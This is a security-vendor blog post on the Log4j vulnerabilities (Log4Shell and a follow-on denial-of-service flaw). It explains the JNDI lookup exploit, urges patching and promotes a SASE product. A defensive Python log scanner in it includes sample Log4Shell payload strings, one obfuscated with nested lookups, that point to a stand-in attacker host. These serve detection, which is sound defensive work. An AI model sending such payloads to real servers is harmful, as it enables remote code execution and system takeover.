In quick succession in December, The Apache Software Foundation released information on two critical vulnerabilities in its Log4j Java-based library.
The first vulnerability, CVE-2021-44228, also known as Log4Shell or LogJam, was reported as an unauthenticated remote code execution (RCE) vulnerability. By exploiting how the library processes the messages it logs, an attacker can achieve a complete system takeover. Due to its critical nature and the ease of exploitation, it received the highest possible Common Vulnerability Scoring System (CVSS) score of 10. The second vulnerability, CVE-2021-45046, was discovered shortly after the initial exploit was patched. It is rated 3.7 out of 10 on the CVSS and would lead to a denial of service (DOS).
At the time of writing, patches have been released to address both vulnerabilities.
Why should I care about Log4j?
Log4j is one of the most widely-used logging libraries in the world. Its adaptable logging capabilities make it useful across any type of infrastructure or application. Countless enterprise, government and open-source applications use Log4j. As a result, everyone has been rapidly patching their software since the vulnerabilities were announced.
Remote code execution (CVE-2021-44228)
The potential scope of the initial RCE vulnerability CVE-2021-44228 is astounding. Any device or app connected to the internet that runs Log4j versions 2.0 through 2.14.1 is at risk.
In addition, exploiting the vulnerability is relatively straightforward. By simply sending a malicious string that the application then logs, attackers can trigger a lookup feature in Log4j that retrieves information from an external source.
In this case, attackers use the Java Naming and Directory Interface (JNDI) to make the application issue an external network request for the malicious payload, in the form of a Java file. From there, the attacker is free to deliver whatever malware or backdoor they choose into the infrastructure.
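As an added defender-side example (not code from the original post or from Lookout), the following Python scans web-server log lines for the JNDI lookup pattern described above. Detections that only match the literal `${jndi:` string miss input wrapped in nested lookups that Log4j resolves first, so the scanner collapses the documented `${lower:...}`, `${upper:...}` and `${name:-default}` forms before matching. The sample log lines and the `attacker.example` host are constructed for the example.

```python
import re
from typing import List

# Constructed sample access-log lines (not real traffic). Line 2 carries a
# literal JNDI lookup in the User-Agent, line 3 hides the same lookup behind
# nested ${lower:...} lookups, lines 1 and 4 are benign.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"
10.0.0.7 - - [10/Dec/2021:10:01:09 +0000] "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"
10.0.0.9 - - [10/Dec/2021:10:02:15 +0000] "GET /login HTTP/1.1" 200 "${${lower:j}ndi:${lower:rmi}://attacker.example/b}"
10.0.0.5 - - [10/Dec/2021:10:03:44 +0000] "POST /api HTTP/1.1" 201 "curl/7.79.1"
"""

# Innermost nested lookups in the forms Log4j documents: ${lower:X}, ${upper:X}
# and ${name:-default}. The character class excludes braces so only an
# innermost lookup (one with no further nesting) matches on each pass.
_NESTED = re.compile(r"\$\{(lower|upper):([^${}]*)\}|\$\{[^${}]*:-([^${}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi:", re.IGNORECASE)


def _collapse(m: "re.Match[str]") -> str:
    """Replace one innermost lookup with the value Log4j would resolve it to."""
    if m.group(1) == "lower":
        return m.group(2).lower()
    if m.group(1) == "upper":
        return m.group(2).upper()
    return m.group(3)  # ${name:-default} resolves to its default value


def normalize_lookups(text: str) -> str:
    """Collapse nested lookups inner-to-outer until none remain."""
    prev = None
    while prev != text:  # each pass removes at least one ${...} pair, so this terminates
        prev = text
        text = _NESTED.sub(_collapse, text)
    return text


def scan_log(log: str) -> List[dict]:
    """Return one finding per line containing a (possibly nested) JNDI lookup."""
    findings = []
    for lineno, line in enumerate(log.splitlines(), start=1):
        normalized = normalize_lookups(line)
        m = _JNDI.search(normalized)
        if not m:
            continue
        end = normalized.find("}", m.end())  # keep the lookup through its closing brace
        lookup = normalized[m.start():end + 1] if end != -1 else normalized[m.start():]
        findings.append({"line": lineno, "source": line.split()[0], "lookup": lookup})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']} from {f['source']}: {f['lookup']}")
```

The normalized lookup string (rather than the raw, possibly obfuscated line) is what an analyst wants in the alert, since it shows the scheme and host the vulnerable application would have contacted.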
Denial of service (CVE-2021-45046)
The second vulnerability, CVE-2021-45046, was uncovered shortly after the initial patch was released. According to the CVE description, the initial patch was “incomplete” and this new exploit “could allow attackers… to craft malicious input data using a JNDI lookup pattern resulting in a denial of service (DOS) attack.”
Key Action: Apply the latest patch as soon as possible
Update any server, app or resource that uses Log4j with the latest patch immediately. This patch includes coverage for both the latest DOS vulnerability and the original RCE vulnerability.
How SASE can help protect you against this type of risk
As soon as the proof of concept (PoC) exploit was released on GitHub, threat actors began actively scanning the internet for vulnerable assets. Lookout customers who use the Lookout Security Platform, our Secure Access Service Edge (SASE) solution, are equipped with several ways to protect their sensitive data and mitigate the risks associated with this vulnerability.
Restrict access to private apps
To mitigate the possibility of data exfiltration, organizations should restrict access to their apps running on Infrastructure-as-a-Service (IaaS) and in on-premises data centers using Zero Trust Network Access (ZTNA). By implementing user-to-app segmentation with ZTNA, the apps are cloaked and not openly accessible via the internet. In addition, ZTNA limits the possibility of attackers using stolen credentials to access these resources, move laterally and discover sensitive data to exfiltrate.
Monitor user and app behaviors
Organizations should implement defense-in-depth strategies by closely monitoring both the user and app behaviors. By flagging behavior indicative of an exploit, such as an anomalous login location or unusual file download volume, you will be able to detect and respond to malicious activities across your cloud and on-prem infrastructure as well as your endpoint devices.
Encrypt sensitive data
Lookout SASE also has integrated enterprise digital rights management (E-DRM) to encrypt data so that only authorized users have access even if it’s passed around offline. Sensitive data is dynamically identified by data loss prevention (DLP) with exact data match (EDM) and optical character recognition (OCR), then classified as sensitive by Microsoft AIP and Titus. This enables you to build a number of data access and protection policies that apply to all cloud-based or on-premises data.
Monitor connected apps
Connected apps are third-party apps that integrate via authorization tokens such as OAuth or JSON Web Tokens with platforms such as Office 365, Google Workspace, and Salesforce. These apps remain mostly invisible but can still upload and download data from the platforms with which they’re integrated. Lookout SASE can discover and monitor connected apps for suspicious activities while also providing remediation, alerting, revocation of access, and blocking capabilities.
To get started on your SASE journey, download a complimentary copy of the 2021 Gartner Strategic Roadmap for SASE Convergence.
Book a personalized, no-pressure demo today to learn:
- How adversaries are leveraging avenues outside traditional email to conduct phishing on iOS and Android devices
- Real-world examples of phishing and app threats that have compromised organizations
- How an integrated endpoint-to-cloud security platform can detect threats and protect your organization